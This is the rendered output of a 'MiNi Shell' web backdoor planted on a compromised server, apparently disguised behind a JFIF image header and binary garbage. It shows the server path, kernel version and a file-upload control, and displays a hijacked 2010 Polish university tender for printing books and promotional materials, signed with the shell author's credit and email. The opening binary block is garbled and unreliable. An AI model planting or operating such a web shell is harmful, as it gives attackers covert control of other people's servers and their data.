JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100125/21466-N-2010.html

<p class="kh_header"><b>Włocławek: Druk wydawnictw książkowych i materiałów promujących Państwową Wyższą Szkołę Zawodową we Włocławku na 2010r.</b><br>
<b>Numer ogłoszenia: 21466 - 2010; data zamieszczenia: 25.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa we Włocławku , ul. 3 Maja 17, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 2316080, faks 054 2314352.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Druk wydawnictw książkowych i materiałów promujących Państwową Wyższą Szkołę Zawodową we Włocławku na 2010r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w przetargu nieograniczonym  jest Druk wydawnictw        i materiałów promujących Państwową Wyższą Szkołę Zawodową we Włocławku  na 2010 r

Załącznik nr 1 do SIWZ

OPIS PRZEDMIOTU ZAMÓWIENIA


PRZEDMIOT  ZAMÓWIENIA 

Przedmiotem zamówienia w przetargu nieograniczonym  jest Druk wydawnictw                      i materiałów promujących Państwową Wyższą Szkołę Zawodową we Włocławku           na 2010 r.


I.	I CZĘŚĆ ZAMÓWIENIA


Niniejszą część zamówienia stanowi skład dostarczonego przez Zamawiającego na nośniku elektronicznym materiału i druk wydawnictw:

NAKŁAD:					 - 1050 egzemplarzy;
ŁĄCZNA ILOŚĆ ARKUSZY:		 - 22 000;
ILOŚĆ PUBLIKACJI:			 - 11.

Dane techniczne wydawnictw:

1.	Format książki po obcięciu: 242x161 mm;
2.	Papier: okładka: karton jednostronnie kredowany z białym spodem 240 g  -m2;
3.	Środek: offset 80 g  -m2;
4.	Druk: okładka 2+0; środek 1+1;
5.	Oprawa: miękka, klejona - 1000 egzemplarzy;
6.	Oprawa twarda - 50 egzemplarzy;
7.	Wykończenie: folia błysk jednostronnie;
8.	Zdjęcia pełen kolor, papier kreda 80 g  -m2 - ok. 20 sztuk we wszystkich publikacjach łącznie;
9.	Wersja językowa - polska, pojedyncze artykuły i pozycje w języku niemieckim            i angielskim;
10.	Wykonawca przekaże Zamawiającemu wersję wydawnictwa na nośniku elektronicznym.
11.	Projekt okładki wliczony w cenę


Termin wykonania: 

Od podpisania umowy do 31 grudnia 2010 r. cyklicznie, po uprzednim, wyprzedzającym  uzgodnieniu z Zamawiającym. 

1.	Wykonawca zobowiązuje się do wykonania składu do pierwszej korekty w terminie 14 dni od złożenia zamówienia przez Zamawiającego. 
2.	Przygotowany materiał do korekty Wykonawca przesyła w uzgodnieniu 
z Zamawiającym w formie papierowej, e-mailem lub w postaci plików pdf.
3.	Zamawiający zobowiązuje się do dokonania korekty w terminie 21 dni.
4.	Zamawiający przewiduje nie więcej niż dwie korekty.
5.	Wykonawca zobowiązuje się do realizacji zamówienia w terminie 14 dni od dnia zatwierdzenia ostatecznej korekty przez Zamawiającego.


Dostarczenie i rozładunek:
Po opracowaniu i druku zadaniem Wykonawcy będzie dostarczenie zamówionej partii wydawnictw wraz z rozładunkiem w siedzibie Zamawiającego we Włocławku przy ul. 3 Maja 17, pok. 28


II.	II CZĘŚĆ ZAMÓWIENIA

Niniejszą część zamówienia stanowi skład dostarczonego przez Zamawiającego                  na nośniku elektronicznym materiału wraz z projektami graficznymi i druk następujących materiałów reklamowych:

Lp.	Nazwa produktu, usługi	Nakład  -ilość	Opis przedmiotu zamówienia	Termin wykonania
1.	Okładki dyplomowe dla maturzystów A4 +	2000 szt	  - Format A4 +
  - Papier: kreda 250g  -m2 błysk 
  - Druk: (4+0) CMYK 
  - Wykończenie: wycięcie na wizytówki
  - Uszlachetnienia: folia błysk (1+0)	31 marca 2010
2.	Listownik Rektora	3000 szt	  - Format A4 
  - Papier ozdobny: IVOLINE 110 g  -m2 
  - Druk: (2+0) CMYK	30 czerwca 2010
3.	Zakładki do książek	5000 szt	  - Format 222 x 60 mm
  - Papier: kreda 300 g  -m2 matowa 
  - Druk: (4+4) CMYK 
  - Uszlachetnienia: folia matowa (1+1)	30 czerwca 2010
4.	Karty świąteczne z wkładkami i kopertami	200 szt	Karta:
  - Format A6 po złożeniu 105x148
  - Papier ozdobny: 300 - 350 g  -m2 
  - Druk: (4+4) CMYK, błyszczący złoty lub srebrny nadruk (folia)
  - Wykończenie: wybiórczo lakier UV, ażurowe wycięcia
Wkładka:
  - Format A6 po złożeniu 105x148
  - Papier ozdobny: 80 - 150 g  -m2 
  - Druk: (4+0) CMYK, błyszczący złoty lub srebrny nadruk
Koperta:
  - Papier ozdobny	12 listopada 2010
5.	Kalendarz trójdzielny	500 szt	  - Główka 380 x 260mm, kaszerowana na tekturze, 
  - Druk (4+0) CMYK + lakier UV wybiórczo
  - Plecki (ogon) 380x590mm, 
  - Druk (4+0) CMYK 
  - 3 kalendaria  (3 wzory do akceptacji)
  - Koperta biała z nadrukiem (2+0) CMYK	12 listopada 2010
6.	Ulotki rekrutacyjne	20000 szt	  - Format: Ulotka A4, składana do formatu 210 x 99 mm (1  -3 A4 po złożeniu), 
  - Druk (4+4) CMYK 
  - Papier: kreda 170g  -m2 
  - Wykończenie: falcowanie
  - Nakład łącznie: 20000 szt.
1 x 6000 szt.
6 x 1000 szt.
4 x 2000 szt.	27 sierpnia 2010
7.	Ulotki dot. studiów podyplomowych	1000 szt	  - Format: Ulotka A4, składana do formatu 210 x 99 mm (1  -3 A4 po złożeniu), 
  - Druk (4+4) CMYK 
  - Papier: kreda 170g  -m2 
  - Wykończenie: falcowanie	30 maja 2010
8.	Plakat rekrutacyjny	500 szt	  - Format: A2   - Druk (4+0) CMYK   - Papier: kreda 200g  -m2   - Uszlachetnianie: folia błysk 1 + 0	27 sierpnia 2010
9.	Wkładka do Wiadomości Uczelnianych	1500 szt	  - Format: A3 po złożeniu ? A3
  - Druk (4+4) CMYK 
  - Papier: kreda błysk 200g  -m2 
  - Wykończenie: falcowanie	22 lutego 2010
10.	Informator uczelniany z notatnikiem	500 szt	  - Format: 115x190 mm,
  - Objętość łącznie: 32 str.: 20 str. z zadrukiem + 8 str. niezadrukowanych z hasłem:  Notatki (wg projektu) + okładka (4 str.)
  - Papier: 
okładka: karton jednostronnie kredowany z białym spodem 240 g  -m2, 
środek: kreda 90 g  -m2,
  - Druk: okładka 4+4 CMYK; środek 4+4 CMYK, 
  - Oprawa: miękka, szycie zeszytowe na dwie zszywki, 
  - Wykończenie: okładka - folia matowa jednostronnie, wybiórczo lakier UV	27 sierpnia 2010
11.	Wiadomości Uczelniane	2000 szt.
 (1500 szt. - I nr,
500 szt. II nr)	  - Format: A4 
  - Objętość: 28 str. + okładka = 32 str. 
  - Okładka kreda 200 g  -m2 
  - Druk: (4+4) CMYK 
  - Środek: offset 100 g  -m2 
  - Druk (4+4) CMYK 
  - Wykończenie: szycie zeszytowe na dwie zszywki
  - Nakład 1 numeru: 1500 szt. 
  - Nakład 2 numeru: 500 szt.	1 numer: 22 luty 2010,          2 numer: 15 września 2010

Dostarczenie i rozładunek:

Po opracowaniu i druku zadaniem Wykonawcy będzie dostarczenie zamówionej partii materiałów promujących PWSZ we Włocławku wraz z rozładunkiem w siedzibie Zamawiającego we Włocławku przy ul. 3 Maja 17, pok. 28.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.55.30.00-5, 79.80.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Oferta powinna być zabezpieczona wadium w wysokości:
1 100,00 zł za I część zamówienia 
1 000,00 zł za II część zamówienia 
2.	Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt  2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3.	Wadium wnoszone w pieniądzu należy wpłacić do dnia 02.02.2010 r. przelewem na konto Państwowej Wyższej Szkoły Zawodowej we Włocławku w BOŚ O/Włocławek numer 72 1540 1069 2001 8720 6079 0001 z dopiskiem WADIUM- przetarg na: Druk wydawnictw książkowych i materiałów promujących Państwową Wyższą Szkołę Zawodową we Włocławku na 2010 r. 
4.	Kopię dowodu wpłacenia wadium należy dostarczyć do Zamawiającego do dnia 
02.02.2010 r. , do godz. 9.00 (oryginał  należy dołączyć do oferty).
4.	Kopię wadium w formie poręczeń lub gwarancji należy dostarczyć do dnia 02.02.2010 r. do godz.  9.00 (oryginał  należy dołączyć do oferty).
5.	Wykonawca, którego oferta, nie będzie zabezpieczona akceptowaną formą wadium zostanie przez Zamawiającego wykluczony, a oferta uznana za odrzuconą.
6.	Wadium wniesione w formie gwarancji i poręczeń winno obejmować wszystkie    przypadki, w których Wykonawca traci wadium na rzecz Zamawiającego zgodnie 
z art. 46 4 a i 5 Ustawy. W przypadku, gdy dokumenty te nie będą zabezpieczały 
w pełnym zakresie możliwych roszczeń Zamawiającego Wykonawca zostanie wykluczony z postępowania.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Zgodnie z art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2)	posiadania wiedzy i doświadczenia;
3)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi 
do wykonania Zamówienia;
4)	sytuacji ekonomicznej i finansowej.

      Warunki te będą spełnione przez Wykonawcę, jeżeli:

1)	jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na minimum 50.000,00 zł;
2)	wykonał minimum trzy usługi drukowania w zakresie niezbędnym 
do wykazania spełnienia warunku wiedzy i doświadczenia do realizacji Zamówienia.

2.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie Zamówienia Wykonawca składa:

1)	oświadczenie o braku podstaw do wykluczenia;
2)	aktualny odpis z właściwego rejestru.

3.	Zamawiający dokona oceny spełnienia warunków wymienionych w punkcie 1 i 2, 
na podstawie złożonych wraz z ofertą oświadczeń, dokumentów i wykazów wymienionych w części V niniejszej SIWZ według formuły  spełnia - nie spełnia .

4.	Zamawiający dokona wyboru oferty spośród ofert niepodlegających odrzuceniu.
5.	Zamawiający odrzuci ofertę jeżeli:

1)	jest niezgodna z Ustawą;
2)	jej treść nie odpowiada treści SIWZ z zastrzeżeniem art. 87 ust. 2 pkt 3 Ustawy;
3)	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów 
o zwalczaniu nieuczciwej konkurencji;
4)	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;
5)	została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu 
o udzielenie zamówienia;
6)	zawiera błędy w obliczeniu ceny;
7)	Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki polegającej na niezgodności oferty ze SIWZ, niepowodującej istotnych zmian w treści oferty;
8)	jest nieważna na postawie odrębnych przepisów.

6.	Zamawiający unieważni postępowanie o udzielenie zamówienia, jeżeli:

1)	nie złożono żadnej oferty niepodlegającej odrzuceniu;
2)	w przypadkach, o których mowa w art. 91 ust. 5 Ustawy, zostały złożone oferty dodatkowe o takiej samej cenie;
3)	wystąpiła istotna zmiana okoliczności powodująca, że prowadzenie postępowania lub wykonanie zamówienia nie leży w interesie publicznym, czego nie można było wcześniej przewidzieć;
4)	postępowanie obarczone jest niemożliwą do usunięcia wadą uniemożliwiającą zawarcie niepodlegającej unieważnieniu umowy w sprawie zamówienia publicznego..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu wykazania spełnienia warunków udziału w Postępowaniu, każdy z Wykonawców przedkłada formularz oferty (zał. Nr 2) wraz z  następującymi oświadczeniami 
i dokumentami:

1.	Zaakceptowanym projektem umowy (załącznik Nr 3 do SIWZ). 
2.	Oświadczeniem zgodnie ze wzorem stanowiącym załącznik Nr 4 do SIWZ. 
3.	Oświadczeniem zgodnie ze wzorem stanowiącym załącznik Nr 5 do SIWZ. 
4.	Wykazem wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług drukowania w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
z podaniem ich  wartości, przedmiotu, dat wykonania i odbiorców, wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie 
wg wzoru, który stanowi załącznik Nr 6 do SIWZ. 
5.	Aktualnym odpisem z właściwego rejestru, albo zaświadczeniem o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
6.	Opłaconą polisą, a w przypadku jej braku innym dokumentem potwierdzającym, 
że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> pwsz.wloclawek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa we Włocławku, ul. 3 Maja 17, 87-800 Włocławek- II piętro, pok. 32.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2010 godzina 10:30, miejsce: Państwowa Wyższa Szkoła Zawodowa we Włocławku, ul. 3 Maja 17, 87-800 Włocławek, Kancelaria Uczelni - I piętro, pok. 16.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Druk wydawnictw książkowych Państwowej Wyższej Szkoły Zawodowej we Włocławku na 2010 r.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	I CZĘŚĆ ZAMÓWIENIA


Niniejszą część zamówienia stanowi skład dostarczonego przez Zamawiającego na nośniku elektronicznym materiału i druk wydawnictw:

NAKŁAD:					 - 1050 egzemplarzy;
ŁĄCZNA ILOŚĆ ARKUSZY:		 - 22 000;
ILOŚĆ PUBLIKACJI:			 - 11.

Dane techniczne wydawnictw:

1.	Format książki po obcięciu: 242x161 mm;
2.	Papier: okładka: karton jednostronnie kredowany z białym spodem 240 g/m2;
3.	Środek: offset 80 g/m2;
4.	Druk: okładka 2+0; środek 1+1;
5.	Oprawa: miękka, klejona - 1000 egzemplarzy;
6.	Oprawa twarda - 50 egzemplarzy;
7.	Wykończenie: folia błysk jednostronnie;
8.	Zdjęcia pełen kolor, papier kreda 80 g/m2 - ok. 20 sztuk we wszystkich publikacjach łącznie;
9.	Wersja językowa - polska, pojedyncze artykuły i pozycje w języku niemieckim            i angielskim;
10.	Wykonawca przekaże Zamawiającemu wersję wydawnictwa na nośniku elektronicznym.
11.	Projekt okładki wliczony w cenę


Termin wykonania: 

Od podpisania umowy do 31 grudnia 2010 r. cyklicznie, po uprzednim, wyprzedzającym  uzgodnieniu z Zamawiającym. 

1.	Wykonawca zobowiązuje się do wykonania składu do pierwszej korekty w terminie 14 dni od złożenia zamówienia przez Zamawiającego. 
2.	Przygotowany materiał do korekty Wykonawca przesyła w uzgodnieniu 
z Zamawiającym w formie papierowej, e-mailem lub w postaci plików pdf.
3.	Zamawiający zobowiązuje się do dokonania korekty w terminie 21 dni.
4.	Zamawiający przewiduje nie więcej niż dwie korekty.
5.	Wykonawca zobowiązuje się do realizacji zamówienia w terminie 14 dni od dnia zatwierdzenia ostatecznej korekty przez Zamawiającego.


Dostarczenie i rozładunek:
Po opracowaniu i druku zadaniem Wykonawcy będzie dostarczenie zamówionej partii wydawnictw wraz z rozładunkiem w siedzibie Zamawiającego we Włocławku przy ul. 3 Maja 17, pok. 28.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.55.30.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Druk materiałów promujących Państwową Wyższą Szkołę Zawodową we Włocławku na 2010r..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> II CZĘŚĆ ZAMÓWIENIA

Niniejszą część zamówienia stanowi skład dostarczonego przez Zamawiającego                  na nośniku elektronicznym materiału wraz z projektami graficznymi i druk następujących materiałów reklamowych:


1.Okładki dyplomowe dla maturzystów A4 +	
- 2000 szt	  
-Format A4 +
 -Papier: kreda 250g -m2 błysk 
  -Druk: (4+0) CMYK 
  -Wykończenie: wycięcie na wizytówki
  -Uszlachetnienia: folia błysk (1+0)	
31 marca 2010
2.Listownik Rektora 
-3000 szt	  
-Format A4 
 -Papier ozdobny: IVOLINE 110 g -m2 
 -Druk: (2+0) CMYK
- 30 czerwca 2010
3. Zakładki do książek	-
5000 szt	 
 -Format 222 x 60 mm
  -Papier: kreda 300 g -m2 matowa 
  -Druk: (4+4) CMYK 
  -Uszlachetnienia: folia matowa (1+1)	
30 czerwca 2010
4.	Karty świąteczne z wkładkami i kopertami	
200 szt	Karta:
  -Format A6 po złożeniu 105x148
  -Papier ozdobny: 300 - 350 g -m2 
  -Druk: (4+4) CMYK, błyszczący złoty lub srebrny nadruk (folia)
  -Wykończenie: wybiórczo lakier UV, ażurowe wycięcia
Wkładka:
  -Format A6 po złożeniu 105x148
  -Papier ozdobny: 80 - 150 g -m2 
  -Druk: (4+0) CMYK, błyszczący złoty lub srebrny nadruk
Koperta:
  -Papier ozdobny	
12 listopada 2010
5.	Kalendarz trójdzielny	
-500 szt	  
-Główka 380 x 260mm, kaszerowana na tekturze, 
  -Druk (4+0) CMYK + lakier UV wybiórczo
  -Plecki (ogon) 380x590mm, 
  -Druk (4+0) CMYK 
  -3 kalendaria  (3 wzory do akceptacji)
  -Koperta biała z nadrukiem (2+0) CMYK	
12 listopada 2010
6.	Ulotki rekrutacyjne	
-20000 szt	 
 -Format: Ulotka A4, składana do formatu 210 x 99 mm (1 -3 A4 po złożeniu), 
  -Druk (4+4) CMYK 
  -Papier: kreda 170g -m2 
  -Wykończenie: falcowanie
  -Nakład łącznie: 20000 szt.
1 x 6000 szt.
6 x 1000 szt.
4 x 2000 szt.	
27 sierpnia 2010
7.	Ulotki dot. studiów podyplomowych	
-1000 szt	  
-Format: Ulotka A4, składana do formatu 210 x 99 mm (1 -3 A4 po złożeniu), 
  -Druk (4+4) CMYK 
  -Papier: kreda 170g -m2 
  -Wykończenie: falcowanie	30 maja 2010
8.	Plakat rekrutacyjny	
-500 szt	  
-Format: A2   
-Druk (4+0) CMYK   
-Papier: kreda 200g -m2   
-Uszlachetnianie: folia błysk 1 + 0	
-27 sierpnia 2010
9.Wkładka do Wiadomości Uczelnianych	-
1500 szt	  
-Format: A3 po złożeniu ? A3
  -Druk (4+4) CMYK 
  -Papier: kreda błysk 200g -m2 
  -Wykończenie: falcowanie	
-22 lutego 2010
10.	Informator uczelniany z notatnikiem	-
500 szt	  
-Format: 115x190 mm,
  -Objętość łącznie: 32 str.: 20 str. z zadrukiem + 8 str. niezadrukowanych z hasłem:   Notatki  (wg projektu) + okładka (4 str.)
  -Papier: 
okładka: karton jednostronnie kredowany z białym spodem 240 g -m2, 
środek: kreda 90 g -m2,
  -Druk: okładka 4+4 CMYK; środek 4+4 CMYK, 
  -Oprawa: miękka, szycie zeszytowe na dwie zszywki, 
  -Wykończenie: okładka - folia matowa jednostronnie, wybiórczo lakier UV	
-27 sierpnia 2010
11.	Wiadomości Uczelniane	-
2000 szt.(1500 szt. - I nr,
500 szt. II nr)	 
 -Format: A4 
  -Objętość: 28 str. + okładka = 32 str. 
  -Okładka kreda 200 g -m2 
  -Druk: (4+4) CMYK 
  -Środek: offset 100 g -m2 
  -Druk (4+4) CMYK 
  -Wykończenie: szycie zeszytowe na dwie zszywki
  -Nakład 1 numeru: 1500 szt. 
  -Nakład 2 numeru: 500 szt.	1 numer: 22 luty 2010,     2 numer: 15 września 2010

Dostarczenie i rozładunek:

Po opracowaniu i druku zadaniem Wykonawcy będzie dostarczenie zamówionej partii materiałów promujących PWSZ we Włocławku wraz z rozładunkiem w siedzibie Zamawiającego we Włocławku przy ul. 3 Maja 17, pok. 28.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com